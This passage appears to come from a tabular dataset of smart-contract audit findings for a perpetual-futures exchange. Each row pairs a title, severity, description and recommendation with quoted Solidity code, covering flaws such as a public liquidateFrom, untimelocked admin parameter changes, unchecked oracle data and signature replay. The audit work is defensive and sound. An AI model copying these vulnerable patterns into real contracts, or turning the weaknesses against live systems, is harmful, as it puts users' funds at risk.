UpdateInsuranceFund(insuranceFundBalance);\\n}\\n```\\n\\nWhen looking at the test-cases there seems to be a misconception about what unit of amount `withdrawFromInsuranceFund` is taking. 
For example, the insurance fund withdrawal and deposit are not tested for collateral that specifies a precision that is not 18. The test-cases falsely assume that the input to `withdrawFromInsuranceFund` is a WAD value, while it is taking the collateral's `rawAmount` which is then converted to a WAD number.\\ncode/test/test_perpetual.js:L471-L473\\n```\\nawait perpetual.withdrawFromInsuranceFund(toWad(10.111));\\nfund = await perpetual.insuranceFundBalance();\\nassert.equal(fund.toString(), 0);\\n```\\n","Check that `require(wadAmount <= insuranceFundBalance.toUint256(), ""insufficient funds"");`, add a test-suite testing the insurance fund with collaterals with different precision and update existing tests that properly provide the expected input to `withdraFromInsurance`.",,"```\\nfunction withdrawFromInsuranceFund(uint256 rawAmount) public onlyWhitelistAdmin {\\n require(rawAmount > 0, ""invalid amount"");\\n require(insuranceFundBalance > 0, ""insufficient funds"");\\n require(rawAmount <= insuranceFundBalance.toUint256(), ""insufficient funds"");\\n\\n int256 wadAmount = toWad(rawAmount);\\n insuranceFundBalance = insuranceFundBalance.sub(wadAmount);\\n withdrawFromProtocol(msg.sender, rawAmount);\\n\\n require(insuranceFundBalance >= 0, ""negtive insurance fund"");\\n\\n emit UpdateInsuranceFund(insuranceFundBalance);\\n}\\n```\\n" +Perpetual - liquidateFrom should not have public visibility Pending,high,"`Perpetual.liquidate` is used to liquidate an account that is “unsafe,” determined by the relative sizes of `marginBalanceWithPrice` and maintenanceMarginWithPrice:\\n```\\n// safe for liquidation\\nfunction isSafeWithPrice(address guy, uint256 currentMarkPrice) public returns (bool) {\\n return\\n marginBalanceWithPrice(guy, currentMarkPrice) >=\\n maintenanceMarginWithPrice(guy, currentMarkPrice).toInt256();\\n}\\n```\\n\\n`Perpetual.liquidate` allows the caller to assume the liquidated account's position, as well as a small amount of “penalty collateral.” 
The steps to liquidate are, roughly:\\nClose the liquidated account's position\\nPerform a trade on the liquidated assets with the liquidator acting as counter-party\\nGrant the liquidator a portion of the liquidated assets as a reward. An additional portion is added to the insurance fund.\\nHandle any losses\\nWe found several issues in Perpetual.liquidate:\\n`liquidateFrom` has `public` visibility:\\n```\\nfunction liquidateFrom(address from, address guy, uint256 maxAmount) public returns (uint256, uint256) {\\n```\\n\\nGiven that `liquidate` only calls `liquidateFrom` after checking the current contract's status, this oversight allows anyone to call `liquidateFrom` during the `SETTLED` stage:\\n```\\nfunction liquidate(address guy, uint256 maxAmount) public returns (uint256, uint256) {\\n require(status != LibTypes.Status.SETTLED, ""wrong perpetual status"");\\n return liquidateFrom(msg.sender, guy, maxAmount);\\n}\\n```\\n\\nAdditionally, directly calling `liquidateFrom` allows anyone to liquidate on behalf of other users, forcing other accounts to assume liquidated positions.\\nFinally, neither `liquidate` nor `liquidateFrom` check that the liquidated account and liquidator are the same. Though the liquidation accounting process is hard to follow, we believe this is unintended and could lead to large errors in internal contract accounting.","Make `liquidateFrom` an `internal` function\\nIn `liquidate` or `liquidateFrom`, check that `msg.sender != guy`",,"```\\n// safe for liquidation\\nfunction isSafeWithPrice(address guy, uint256 currentMarkPrice) public returns (bool) {\\n return\\n marginBalanceWithPrice(guy, currentMarkPrice) >=\\n maintenanceMarginWithPrice(guy, currentMarkPrice).toInt256();\\n}\\n```\\n" +Unpredictable behavior due to front running or general bad timing Pending,high,"In a number of cases, administrators of contracts can update or upgrade things in the system without warning. 
This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to unfortunate timing of changes.\\nSome instances of this are more important than others, but in general users of the system should have assurances about the behavior of the action they're about to take.\\nThe deployer of the `PerpetualGovernance`, `AMMGovernance`, and `GlobalConfig` contracts are set as administrators for the contracts through `WhitelistedRole`. The `WhitelistedAdminRole` can whitelist other accounts at any time and allow them to perform actions protected by the `onlyWhitelisted` decorator.\\nUpdating governance and global configuration parameters is not protected by a time-lock and takes effect immediately. This, therefore, creates an opportunity for administrators to front-run users on the exchange by changing parameters for orders. It may also allow an administrator to temporarily lift restrictions for themselves (e.g. withdrawalLockBlockCount).\\n`GlobalConfig`\\n`withdrawalLockBlockCount` is queried when applying for withdrawal. This value can be set to zero, allowing immediate withdrawal.\\n`brokerLockBlockCount` is queried when setting a new broker. This value can be set to zero, effectively enabling immediate broker changes.\\n```\\nfunction setGlobalParameter(bytes32 key, uint256 value) public onlyWhitelistAdmin {\\n if (key == ""withdrawalLockBlockCount"") {\\n withdrawalLockBlockCount = value;\\n } else if (key == ""brokerLockBlockCount"") {\\n brokerLockBlockCount = value;\\n } else {\\n revert(""key not exists"");\\n }\\n emit UpdateGlobalParameter(key, value);\\n}\\n```\\n
Admin can front-run specific `matchOrder` calls and set arbitrary dev fees or curve parameters…\\n```\\nfunction setGovernanceParameter(bytes32 key, int256 value) public onlyWhitelistAdmin {\\n if (key == ""initialMarginRate"") {\\n governance.initialMarginRate = value.toUint256();\\n require(governance.initialMarginRate > 0, ""require im > 0"");\\n require(governance.initialMarginRate < 10\\*\\*18, ""require im < 1"");\\n require(governance.maintenanceMarginRate < governance.initialMarginRate, ""require mm < im"");\\n } else if (key == ""maintenanceMarginRate"") {\\n governance.maintenanceMarginRate = value.toUint256();\\n require(governance.maintenanceMarginRate > 0, ""require mm > 0"");\\n require(governance.maintenanceMarginRate < governance.initialMarginRate, ""require mm < im"");\\n require(governance.liquidationPenaltyRate < governance.maintenanceMarginRate, ""require lpr < mm"");\\n require(governance.penaltyFundRate < governance.maintenanceMarginRate, ""require pfr < mm"");\\n } else if (key == ""liquidationPenaltyRate"") {\\n governance.liquidationPenaltyRate = value.toUint256();\\n require(governance.liquidationPenaltyRate < governance.maintenanceMarginRate, ""require lpr < mm"");\\n } else if (key == ""penaltyFundRate"") {\\n governance.penaltyFundRate = value.toUint256();\\n require(governance.penaltyFundRate < governance.maintenanceMarginRate, ""require pfr < mm"");\\n } else if (key == ""takerDevFeeRate"") {\\n governance.takerDevFeeRate = value;\\n } else if (key == ""makerDevFeeRate"") {\\n governance.makerDevFeeRate = value;\\n } else if (key == ""lotSize"") {\\n require(\\n governance.tradingLotSize == 0 || governance.tradingLotSize.mod(value.toUint256()) == 0,\\n ""require tls % ls == 0""\\n );\\n governance.lotSize = value.toUint256();\\n } else if (key == ""tradingLotSize"") {\\n require(governance.lotSize == 0 || value.toUint256().mod(governance.lotSize) == 0, ""require tls % ls == 0"");\\n governance.tradingLotSize = value.toUint256();\\n } 
else if (key == ""longSocialLossPerContracts"") {\\n require(status == LibTypes.Status.SETTLING, ""wrong perpetual status"");\\n socialLossPerContracts[uint256(LibTypes.Side.LONG)] = value;\\n } else if (key == ""shortSocialLossPerContracts"") {\\n require(status == LibTypes.Status.SETTLING, ""wrong perpetual status"");\\n socialLossPerContracts[uint256(LibTypes.Side.SHORT)] = value;\\n } else {\\n revert(""key not exists"");\\n }\\n emit UpdateGovernanceParameter(key, value);\\n}\\n```\\n\\nAdmin can set `devAddress` or even update to a new `amm` and `globalConfig`\\n```\\nfunction setGovernanceAddress(bytes32 key, address value) public onlyWhitelistAdmin {\\n require(value != address(0x0), ""invalid address"");\\n if (key == ""dev"") {\\n devAddress = value;\\n } else if (key == ""amm"") {\\n amm = IAMM(value);\\n } else if (key == ""globalConfig"") {\\n globalConfig = IGlobalConfig(value);\\n } else {\\n revert(""key not exists"");\\n }\\n emit UpdateGovernanceAddress(key, value);\\n}\\n```\\n\\n`AMMGovernance`\\n```\\nfunction setGovernanceParameter(bytes32 key, int256 value) public onlyWhitelistAdmin {\\n if (key == ""poolFeeRate"") {\\n governance.poolFeeRate = value.toUint256();\\n } else if (key == ""poolDevFeeRate"") {\\n governance.poolDevFeeRate = value.toUint256();\\n } else if (key == ""emaAlpha"") {\\n require(value > 0, ""alpha should be > 0"");\\n governance.emaAlpha = value;\\n emaAlpha2 = 10\\*\\*18 - governance.emaAlpha;\\n emaAlpha2Ln = emaAlpha2.wln();\\n } else if (key == ""updatePremiumPrize"") {\\n governance.updatePremiumPrize = value.toUint256();\\n } else if (key == ""markPremiumLimit"") {\\n governance.markPremiumLimit = value;\\n } else if (key == ""fundingDampener"") {\\n governance.fundingDampener = value;\\n } else {\\n revert(""key not exists"");\\n }\\n emit UpdateGovernanceParameter(key, value);\\n}\\n```\\n","The underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is 
because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all updates to system parameters or upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.\\nAdditionally, users should verify the whitelist setup before using the contract system and monitor it for new additions to the whitelist. Documentation should clearly outline what roles are owned by whom to support suitability. Sane parameter bounds should be enforced (e.g. min. disallow block delay of zero )",,"```\\nfunction setGlobalParameter(bytes32 key, uint256 value) public onlyWhitelistAdmin {\\n if (key == ""withdrawalLockBlockCount"") {\\n withdrawalLockBlockCount = value;\\n } else if (key == ""brokerLockBlockCount"") {\\n brokerLockBlockCount = value;\\n } else {\\n revert(""key not exists"");\\n }\\n emit UpdateGlobalParameter(key, value);\\n}\\n```\\n" +AMM - Governance is able to set an invalid alpha value Pending,medium,"According to https://en.wikipedia.org/wiki/Moving_average\\nThe coefficient α represents the degree of weighting decrease, a constant smoothing factor between 0 and 1. A higher α discounts older observations faster.\\nHowever, the code does not check upper bounds. An admin may, therefore, set an invalid alpha that puts `emaAlpha2` out of bounds or negative.\\n```\\n} else if (key == ""emaAlpha"") {\\n require(value > 0, ""alpha should be > 0"");\\n governance.emaAlpha = value;\\n emaAlpha2 = 10\\*\\*18 - governance.emaAlpha;\\n emaAlpha2Ln = emaAlpha2.wln();\\n```\\n",Ensure that the system configuration is always within safe bounds. Document expected system variable types and their safe operating ranges. Enforce that bounds are checked every time a value is set. 
Enforce safe defaults when deploying contracts.\\nEnsure `emaAlpha` is `0 < value < 1 WAD`,,"```\\n} else if (key == ""emaAlpha"") {\\n require(value > 0, ""alpha should be > 0"");\\n governance.emaAlpha = value;\\n emaAlpha2 = 10\\*\\*18 - governance.emaAlpha;\\n emaAlpha2Ln = emaAlpha2.wln();\\n```\\n" +Exchange - insufficient input validation in matchOrders Pending,medium,"`matchOrders` does not check that that the sender has provided the same number of `amounts` as `makerOrderParams`. When fewer `amounts` exist than `makerOrderParams`, the method will revert because of an out-of-bounds array access. When fewer `makerOrderParams` exist than `amounts`, the method will succeed, and the additional values in `amounts` will be ignored.\\nAdditionally, the method allows the sender to provide no `makerOrderParams` at all, resulting in no state changes.\\n`matchOrders` also does not reject trades with an amount set to zero. Such orders should be rejected because they do not comply with the minimum `tradingLotSize` configured for the system. As a side-effect, events may be emitted for zero-amount trades and unexpected state changes may occur.\\n```\\nfunction matchOrders(\\n LibOrder.OrderParam memory takerOrderParam,\\n LibOrder.OrderParam[] memory makerOrderParams,\\n address \\_perpetual,\\n uint256[] memory amounts\\n) public {\\n```\\n\\n```\\nfunction matchOrderWithAMM(LibOrder.OrderParam memory takerOrderParam, address \\_perpetual, uint256 amount) public {\\n```\\n","Resolution\\nThis issue was addressed by following the recommendation to verify that `amounts.length > 0 && makerOrderParams.length == amounts.length`. However, the code does not abort if one of the `amounts` is zero which should never happen and therefore raise an exception due to it likely being an erroneous call. 
Additionally, the method now enforces that only a broker can interact with the interface.\\nRequire `makerOrderParams.length > 0 && amounts.length == makerOrderParams.length`\\nRequire that `amount` or any of the `amounts[i]` provided to `matchOrders` is `>=tradingLotSize`.",,"```\\nfunction matchOrders(\\n LibOrder.OrderParam memory takerOrderParam,\\n LibOrder.OrderParam[] memory makerOrderParams,\\n address \\_perpetual,\\n uint256[] memory amounts\\n) public {\\n```\\n" +AMM - Liquidity provider may lose up to lotSize when removing liquidity Acknowledged,medium,"When removing liquidity, the amount of collateral received is calculated from the `shareAmount` (ShareToken) of the liquidity provider. The liquidity removal process registers a trade on the amount, with the liquidity provider and `AMM` taking opposite sides. Because trading only accepts multiple of the `lotSize`, the leftover is discarded. The amount discarded may be up to `lotSize - 1`.\\nThe expectation is that this value should not be too high, but as `lotSize` can be set to arbitrary values by an admin, it is possible that this step discards significant value. 
Additionally, see issue 6.6 for how this can be exploited by an admin.\\nNote that similar behavior is present in `Perpetual.liquidateFrom`, where the `liquidatableAmount` calculated undergoes a similar modulo operation:\\n```\\nuint256 liquidatableAmount = totalPositionSize.sub(totalPositionSize.mod(governance.lotSize));\\nliquidationAmount = liquidationAmount.ceil(governance.lotSize).min(maxAmount).min(liquidatableAmount);\\n```\\n\\n`lotSize` can arbitrarily be set up to `pos_int256_max` as long as `tradingLotSize % `lotSize` == 0`\\n```\\n} else if (key == ""lotSize"") {\\n require(\\n governance.tradingLotSize == 0 || governance.tradingLotSize.mod(value.toUint256()) == 0,\\n ""require tls % ls == 0""\\n );\\n governance.lotSize = value.toUint256();\\n} else if (key == ""tradingLotSize"") {\\n require(governance.lotSize == 0 || value.toUint256().mod(governance.lotSize) == 0, ""require tls % ls == 0"");\\n governance.tradingLotSize = value.toUint256();\\n```\\n\\n`amount` is derived from `shareAmount` rounded down to the next multiple of the `lotSize`. The leftover is discarded.\\n```\\nuint256 amount = shareAmount.wmul(oldPoolPositionSize).wdiv(shareToken.totalSupply());\\namount = amount.sub(amount.mod(perpetualProxy.lotSize()));\\n\\nperpetualProxy.transferBalanceOut(trader, price.wmul(amount).mul(2));\\nburnShareTokenFrom(trader, shareAmount);\\nuint256 opened = perpetualProxy.trade(trader, LibTypes.Side.LONG, price, amount);\\n```\\n","Ensure that documentation makes users aware of the fact that they may lose up to `lotsize-1` in value.\\nAlternatively, track accrued value and permit trades on values that exceed `lotSize`. 
Note that this may add significant complexity.\\nEnsure that similar system behavior, like the `liquidatableAmount` calculated in `Perpetual.liquidateFrom`, is also documented and communicated clearly to users.",,```\\nuint256 liquidatableAmount = totalPositionSize.sub(totalPositionSize.mod(governance.lotSize));\\nliquidationAmount = liquidationAmount.ceil(governance.lotSize).min(maxAmount).min(liquidatableAmount);\\n```\\n +Oracle - Unchecked oracle response timestamp and integer over/underflow,medium,"The external Chainlink oracle, which provides index price information to the system, introduces risk inherent to any dependency on third-party data sources. For example, the oracle could fall behind or otherwise fail to be maintained, resulting in outdated data being fed to the index price calculations of the AMM. Oracle reliance has historically resulted in crippled on-chain systems, and complications that lead to these outcomes can arise from things as simple as network congestion.\\nEnsuring that unexpected oracle return values are properly handled will reduce reliance on off-chain components and increase the resiliency of the smart contract system that depends on them.\\nThe `ChainlinkAdapter` and `InversedChainlinkAdapter` take the oracle's (int256) `latestAnswer` and convert the result using `chainlinkDecimalsAdapter`. 
This arithmetic operation can underflow/overflow if the Oracle provides a large enough answer:\\n```\\nint256 public constant chainlinkDecimalsAdapter = 10\\*\\*10;\\n\\nconstructor(address \\_feeder) public {\\n feeder = IChainlinkFeeder(\\_feeder);\\n}\\n\\nfunction price() public view returns (uint256 newPrice, uint256 timestamp) {\\n newPrice = (feeder.latestAnswer() \\* chainlinkDecimalsAdapter).toUint256();\\n timestamp = feeder.latestTimestamp();\\n}\\n```\\n\\n```\\nint256 public constant chainlinkDecimalsAdapter = 10\\*\\*10;\\n\\nconstructor(address \\_feeder) public {\\n feeder = IChainlinkFeeder(\\_feeder);\\n}\\n\\nfunction price() public view returns (uint256 newPrice, uint256 timestamp) {\\n newPrice = ONE.wdiv(feeder.latestAnswer() \\* chainlinkDecimalsAdapter).toUint256();\\n timestamp = feeder.latestTimestamp();\\n}\\n```\\n\\nThe oracle provides a timestamp for the `latestAnswer` that is not validated and may lead to old oracle timestamps being accepted (e.g. caused by congestion on the blockchain or a directed censorship attack).\\n```\\n timestamp = feeder.latestTimestamp();\\n}\\n```\\n","Use `SafeMath` for mathematical computations\\nVerify `latestAnswer` is within valid bounds (!=0)\\nVerify `latestTimestamp` is within accepted bounds (not in the future, was updated within a reasonable amount of time)\\nDeduplicate code by combining both Adapters into one as the only difference is that the `InversedChainlinkAdapter` returns `ONE.wdiv(price)`.",,"```\\nint256 public constant chainlinkDecimalsAdapter = 10\\*\\*10;\\n\\nconstructor(address \\_feeder) public {\\n feeder = IChainlinkFeeder(\\_feeder);\\n}\\n\\nfunction price() public view returns (uint256 newPrice, uint256 timestamp) {\\n newPrice = (feeder.latestAnswer() \\* chainlinkDecimalsAdapter).toUint256();\\n timestamp = feeder.latestTimestamp();\\n}\\n```\\n" +Perpetual - Administrators can put the system into emergency mode indefinitely Pending,medium,"There is no limitation on how long 
an administrator can put the `Perpetual` contract into emergency mode. Users cannot trade or withdraw funds in emergency mode and are effectively locked out until the admin chooses to put the contract in `SETTLED` mode.\\n```\\nfunction beginGlobalSettlement(uint256 price) public onlyWhitelistAdmin {\\n require(status != LibTypes.Status.SETTLED, ""already settled"");\\n settlementPrice = price;\\n status = LibTypes.Status.SETTLING;\\n emit BeginGlobalSettlement(price);\\n}\\n```\\n\\n```\\nfunction endGlobalSettlement() public onlyWhitelistAdmin {\\n require(status == LibTypes.Status.SETTLING, ""wrong perpetual status"");\\n\\n address guy = address(amm.perpetualProxy());\\n settleFor(guy);\\n status = LibTypes.Status.SETTLED;\\n\\n emit EndGlobalSettlement();\\n}\\n```\\n","Resolution\\nThe client provided the following statement addressing the issue:\\nIt should be solved by voting. Moreover, we add two roles who is able to disable withdrawing /pause the system.\\nThe duration of the emergency phase is still unrestricted.\\nSet a time-lock when entering emergency mode that allows anyone to set the system to `SETTLED` after a fixed amount of time.",,"```\\nfunction beginGlobalSettlement(uint256 price) public onlyWhitelistAdmin {\\n require(status != LibTypes.Status.SETTLED, ""already settled"");\\n settlementPrice = price;\\n status = LibTypes.Status.SETTLING;\\n emit BeginGlobalSettlement(price);\\n}\\n```\\n" +Signed data may be usable cross-chain,medium,"Signed order data may be re-usable cross-chain as the chain-id is not explicitly part of the signed data.\\nIt is also recommended to further harden the signature verification and validate that `v` and `s` are within expected bounds. 
`ecrecover()` returns `0x0` to indicate an error condition, therefore, a `signerAddress` or `recovered` address of `0x0` should explicitly be disallowed.\\nThe signed order data currently includes the EIP712 Domain Name `Mai Protocol` and the following information:\\n```\\nstruct Order {\\n address trader;\\n address broker;\\n address perpetual;\\n uint256 amount;\\n uint256 price;\\n /\\*\\*\\n \\* Data contains the following values packed into 32 bytes\\n \\* ╔════════════════════╤═══════════════════════════════════════════════════════════╗\\n \\* ║ │ length(bytes) desc ║\\n \\* ╟────────────────────┼───────────────────────────────────────────────────────────╢\\n \\* ║ version │ 1 order version ║\\n \\* ║ side │ 1 0: buy (long), 1: sell (short) ║\\n \\* ║ isMarketOrder │ 1 0: limitOrder, 1: marketOrder ║\\n \\* ║ expiredAt │ 5 order expiration time in seconds ║\\n \\* ║ asMakerFeeRate │ 2 maker fee rate (base 100,000) ║\\n \\* ║ asTakerFeeRate │ 2 taker fee rate (base 100,000) ║\\n \\* ║ (d) makerRebateRate│ 2 rebate rate for maker (base 100) ║\\n \\* ║ salt │ 8 salt ║\\n \\* ║ isMakerOnly │ 1 is maker only ║\\n \\* ║ isInversed │ 1 is inversed contract ║\\n \\* ║ │ 8 reserved ║\\n \\* ╚════════════════════╧═══════════════════════════════════════════════════════════╝\\n \\*/\\n bytes32 data;\\n}\\n```\\n\\nSignature verification:\\n```\\nfunction isValidSignature(OrderSignature memory signature, bytes32 hash, address signerAddress)\\n internal\\n pure\\n returns (bool)\\n{\\n uint8 method = uint8(signature.config[1]);\\n address recovered;\\n uint8 v = uint8(signature.config[0]);\\n\\n if (method == uint8(SignatureMethod.ETH\\_SIGN)) {\\n recovered = ecrecover(\\n keccak256(abi.encodePacked(""\\x19Ethereum Signed Message:\\n32"", hash)),\\n v,\\n signature.r,\\n signature.s\\n );\\n } else if (method == uint8(SignatureMethod.EIP712)) {\\n recovered = ecrecover(hash, v, signature.r, signature.s);\\n } else {\\n revert(""invalid sign method"");\\n }\\n\\n return 
signerAddress == recovered;\\n}\\n```\\n","Include the `chain-id` in the signature to avoid cross-chain validity of signatures\\nverify `s` is within valid bounds to avoid signature malleability\\n```\\nif (uint256(s) > 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0) {\\n revert(""ECDSA: invalid signature 's' value"");\\n }\\n```\\n\\nverify `v` is within valid bounds\\n```\\nif (v != 27 && v != 28) {\\n revert(""ECDSA: invalid signature 'v' value"");\\n}\\n```\\n\\nreturn invalid if the result of `ecrecover()` is `0x0`",,"```\\nstruct Order {\\n address trader;\\n address broker;\\n address perpetual;\\n uint256 amount;\\n uint256 price;\\n /\\*\\*\\n \\* Data contains the following values packed into 32 bytes\\n \\* ╔════════════════════╤═══════════════════════════════════════════════════════════╗\\n \\* ║ │ length(bytes) desc ║\\n \\* ╟────────────────────┼─────────────────────────────────────���─────────────────────╢\\n \\* ║ version │ 1 order version ║\\n \\* ║ side │ 1 0: buy (long), 1: sell (short) ║\\n \\* ║ isMarketOrder │ 1 0: limitOrder, 1: marketOrder ║\\n \\* ║ expiredAt │ 5 order expiration time in seconds ║\\n \\* ║ asMakerFeeRate │ 2 maker fee rate (base 100,000) ║\\n \\* ║ asTakerFeeRate │ 2 taker fee rate (base 100,000) ║\\n \\* ║ (d) makerRebateRate│ 2 rebate rate for maker (base 100) ║\\n \\* ║ salt │ 8 salt ║\\n \\* ║ isMakerOnly │ 1 is maker only ║\\n \\* ║ isInversed │ 1 is inversed contract ║\\n \\* ║ │ 8 reserved ║\\n \\* ╚════════════════════╧═══════════════════════════════════════════════════════════╝\\n \\*/\\n bytes32 data;\\n}\\n```\\n" +Exchange - validateOrderParam does not check against SUPPORTED_ORDER_VERSION,medium,"`validateOrderParam` verifies the signature and version of a provided order. 
Instead of checking against the contract constant `SUPPORTED_ORDER_VERSION` it, however, checks against a hardcoded version `2` in the method itself.\\nThis might be a problem if `SUPPORTED_ORDER_VERSION` is seen as the configuration parameter for the allowed version. Changing it would not change the allowed order version for `validateOrderParam` as this constant literal is never used.\\nAt the time of this audit, however, the `SUPPORTED_ORDER_VERSION` value equals the hardcoded value in the `validateOrderParam` method.\\n```\\nfunction validateOrderParam(IPerpetual perpetual, LibOrder.OrderParam memory orderParam)\\n internal\\n view\\n returns (bytes32)\\n{\\n address broker = perpetual.currentBroker(orderParam.trader);\\n require(broker == msg.sender, ""invalid broker"");\\n require(orderParam.getOrderVersion() == 2, ""unsupported version"");\\n require(orderParam.getExpiredAt() >= block.timestamp, ""order expired"");\\n\\n bytes32 orderHash = orderParam.getOrderHash(address(perpetual), broker);\\n require(orderParam.signature.isValidSignature(orderHash, orderParam.trader), ""invalid signature"");\\n require(filled[orderHash] < orderParam.amount, ""fullfilled order"");\\n\\n return orderHash;\\n}\\n```\\n",Check against `SUPPORTED_ORDER_VERSION` instead of the hardcoded value `2`.,,"```\\nfunction validateOrderParam(IPerpetual perpetual, LibOrder.OrderParam memory orderParam)\\n internal\\n view\\n returns (bytes32)\\n{\\n address broker = perpetual.currentBroker(orderParam.trader);\\n require(broker == msg.sender, ""invalid broker"");\\n require(orderParam.getOrderVersion() == 2, ""unsupported version"");\\n require(orderParam.getExpiredAt() >= block.timestamp, ""order expired"");\\n\\n bytes32 orderHash = orderParam.getOrderHash(address(perpetual), broker);\\n require(orderParam.signature.isValidSignature(orderHash, orderParam.trader), ""invalid signature"");\\n require(filled[orderHash] < orderParam.amount, ""fullfilled order"");\\n\\n return 
orderHash;\\n}\\n```\\n" +LibMathSigned - wpowi returns an invalid result for a negative exponent Pending,medium,"`LibMathSigned.wpowi(x,n)` calculates Wad value `x` (base) to the power of `n` (exponent). The exponent is declared as a signed int, however, the method returns wrong results when calculating `x ^(-n)`.\\nThe comment for the `wpowi` method suggests that `n` is a normal integer instead of a Wad-denominated value. This, however, is not being enforced.\\n`LibMathSigned.wpowi(8000000000000000000, 2) = 64000000000000000000`\\n(wrong) `LibMathSigned.wpowi(8000000000000000000, -2) = 64000000000000000000`\\n```\\n// x ^ n\\n// NOTE: n is a normal integer, do not shift 18 decimals\\n// solium-disable-next-line security/no-assign-params\\nfunction wpowi(int256 x, int256 n) internal pure returns (int256 z) {\\n z = n % 2 != 0 ? x : \\_WAD;\\n\\n for (n /= 2; n != 0; n /= 2) {\\n x = wmul(x, x);\\n\\n if (n % 2 != 0) {\\n z = wmul(z, x);\\n }\\n }\\n}\\n```\\n",Make `wpowi` support negative exponents or use the proper type for `n` (uint) and reject negative values.\\nEnforce that the exponent bounds are within sane ranges and less than a Wad to detect potential misuse where someone accidentally provides a Wad value as `n`.\\nAdd positive and negative unit-tests to fully cover this functionality.,,"```\\n// x ^ n\\n// NOTE: n is a normal integer, do not shift 18 decimals\\n// solium-disable-next-line security/no-assign-params\\nfunction wpowi(int256 x, int256 n) internal pure returns (int256 z) {\\n z = n % 2 != 0 ? 
x : \\_WAD;\\n\\n for (n /= 2; n != 0; n /= 2) {\\n x = wmul(x, x);\\n\\n if (n % 2 != 0) {\\n z = wmul(z, x);\\n }\\n }\\n}\\n```\\n" +Outdated solidity version and floating pragma Pending,medium,"Using an outdated compiler version can be problematic especially if there are publicly disclosed bugs and issues (see also https://github.com/ethereum/solidity/releases) that affect the current compiler version.\\nThe codebase specifies a floating version of `^0.5.2` and makes use of the experimental feature `ABIEncoderV2`.\\nIt should be noted, that `ABIEncoderV2` was subject to multiple bug-fixes up until the latest 0.6.xversion and contracts compiled with earlier versions are - for example - susceptible to the following issues:\\nImplicitConstructorCallvalueCheck\\nTupleAssignmentMultiStackSlotComponents\\nMemoryArrayCreationOverflow\\nprivateCanBeOverridden\\nYulOptimizerRedundantAssignmentBreakContinue0.5\\nABIEncoderV2CalldataStructsWithStaticallySizedAndDynamicallyEncodedMembers\\nSignedArrayStorageCopy\\nABIEncoderV2StorageArrayWithMultiSlotElement\\nDynamicConstructorArgumentsClippedABIV2\\nCodebase declares compiler version ^0.5.2:\\n```\\npragma solidity ^0.5.2;\\npragma experimental ABIEncoderV2; // to enable structure-type parameters\\n```\\n\\nAccording to etherscan.io, the currently deployed main-net `AMM` contract is compiled with solidity version 0.5.8:\\nhttps://etherscan.io/address/0xb95B9fb0539Ec84DeD2855Ed1C9C686Af9A4e8b3#code",It is recommended to settle on the latest stable 0.6.x or 0.5.x version of the Solidity compiler and lock the pragma version to a specifically tested compiler release.,,```\\npragma solidity ^0.5.2;\\npragma experimental ABIEncoderV2; // to enable structure-type parameters\\n```\\n +AMM - ONE_WAD_U is never used,low,The const `ONE_WAD_U` is declared but never used. 
Avoid re-declaring the same constants in multiple source-units (and unit-test cases) as this will be hard to maintain.\\n```\\nuint256 private constant ONE\\_WAD\\_U = 10\\*\\*18;\\n```\\n,"Remove unused code. Import the value from a shared resource. E.g.ONE_WAD is declared multiple times in `LibMathSigned`, `LibMathUnsigned`, `AMM`, hardcoded in checks in `PerpetualGovernance.setGovernanceParameter`, `AMMGovernance.setGovernanceParameter`.",,```\\nuint256 private constant ONE\\_WAD\\_U = 10\\*\\*18;\\n```\\n +Perpetual - Variable shadowing in constructor,low,"`Perpetual` inherits from `PerpetualGovernance` and `Collateral`, which declare state variables that are shadowed in the `Perpetual` constructor.\\nLocal constructor argument shadows `PerpetualGovernance.globalConfig`, `PerpetualGovernance.devAddress`, `Collateral.collateral`\\nNote: Confusing name: `Collateral` is an inherited contract and a state variable.\\n```\\nconstructor(address globalConfig, address devAddress, address collateral, uint256 collateralDecimals)\\n public\\n Position(collateral, collateralDecimals)\\n{\\n setGovernanceAddress(""globalConfig"", globalConfig);\\n setGovernanceAddress(""dev"", devAddress);\\n emit CreatePerpetual();\\n}\\n```\\n",Rename the parameter or state variable.,,"```\\nconstructor(address globalConfig, address devAddress, address collateral, uint256 collateralDecimals)\\n public\\n Position(collateral, collateralDecimals)\\n{\\n setGovernanceAddress(""globalConfig"", globalConfig);\\n setGovernanceAddress(""dev"", devAddress);\\n emit CreatePerpetual();\\n}\\n```\\n" +Perpetual - The specified decimals for the collateral may not reflect the token's actual decimals Acknowledged,low,"When initializing the `Perpetual` contract, the deployer can decide to use either `ETH`, or an ERC20-compliant collateral. 
In the latter case, the deployer must provide a nonzero address for the token, as well as the number of `decimals` used by the token:\\n```\\nconstructor(address \\_collateral, uint256 decimals) public {\\n require(decimals <= MAX\\_DECIMALS, ""decimals out of range"");\\n require(\\_collateral != address(0x0) || (\\_collateral == address(0x0) && decimals == 18), ""invalid decimals"");\\n\\n collateral = \\_collateral;\\n scaler = (decimals == MAX\\_DECIMALS ? 1 : 10\\*\\*(MAX\\_DECIMALS - decimals)).toInt256();\\n}\\n```\\n\\nThe provided `decimals` value is not checked for validity and can differ from the actual token's `decimals`.",Ensure to establish documentation that makes users aware of the fact that the decimals configured are not enforced to match the actual tokens decimals. This is to allow users to audit the system configuration and decide whether they want to participate in it.,,"```\\nconstructor(address \\_collateral, uint256 decimals) public {\\n require(decimals <= MAX\\_DECIMALS, ""decimals out of range"");\\n require(\\_collateral != address(0x0) || (\\_collateral == address(0x0) && decimals == 18), ""invalid decimals"");\\n\\n collateral = \\_collateral;\\n scaler = (decimals == MAX\\_DECIMALS ? 1 : 10\\*\\*(MAX\\_DECIMALS - decimals)).toInt256();\\n}\\n```\\n" +AMM - Unchecked return value in ShareToken.mint Pending,low,"`ShareToken` is an extension of the Openzeppelin ERC20Mintable pattern which exposes a method called `mint()` that allows accounts owning the minter role to mint new tokens. The return value of `ShareToken.mint()` is not checked.\\nSince the ERC20 standard does not define whether this method should return a value or revert it may be problematic to assume that all tokens revert. 
